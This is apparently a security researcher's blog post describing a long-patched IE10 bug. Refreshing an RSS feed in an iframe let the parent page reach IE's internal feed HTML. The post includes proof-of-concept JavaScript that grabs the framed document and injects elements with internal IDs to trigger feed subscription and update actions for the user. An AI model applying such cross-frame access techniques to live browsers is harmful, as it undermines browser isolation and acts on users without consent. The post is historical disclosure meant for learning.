IE10 Access to Feeds Generated Page

After playing around with RSS feeds framed inside iFrames, I found that loading a feeds XML in an iFrame and then refreshing it via execCommand gave the parent page access to the internally generated HTML that IE renders for feeds — something that had been blocked in earlier versions.

window.onload = function() {
    window[0][0].document.execCommand("Refresh");
}

function main() {
    window[0].location = "javascript:void(parent.oDocument = document);void(parent.iFrameDocumentMode = document.documentMode)";

    var str = 'We are inside the rss-feeds iFrame.<br />' +
              '<span id="_turnonsynceng_" style="cursor:hand">Click here to turn on Automatic Feed Updates</span><br />' +
              '<span id="_subscribe_" style="cursor:hand">Click here to Subscribe Feeds</span><br />' +
              '<span id="_markasreadtoggle_" style="cursor:hand">Click here to Mark Feeds as read</span><br />';

    oDocument.body.innerHTML = str;
}

The feed page loads at a lower document mode than the host page, which itself opens interesting mixing possibilities. Once the oDocument reference is obtained, elements with known internal RSS IDs (like _subscribe_) can be injected, triggering IE’s own feed-management UI on behalf of the user. Tested on Win8 RTM IE10 Desktop.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Protected Mode Escape via XBAP File Handler] :: [IE10 Screen Not Updated After about:Tabs Navigation] >